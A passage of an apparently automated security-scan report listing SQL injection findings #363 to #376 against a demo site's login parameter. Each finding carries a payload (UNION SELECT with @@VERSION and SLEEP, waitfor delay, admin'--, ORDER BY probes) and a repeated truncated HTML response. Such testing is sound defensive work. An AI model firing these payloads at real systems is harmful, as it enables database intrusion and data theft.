href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #363\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #364\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #365\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io`\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #366\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #367\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #368\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #369Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #370\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #371\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #372\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #373\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #374\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #375\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #376\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 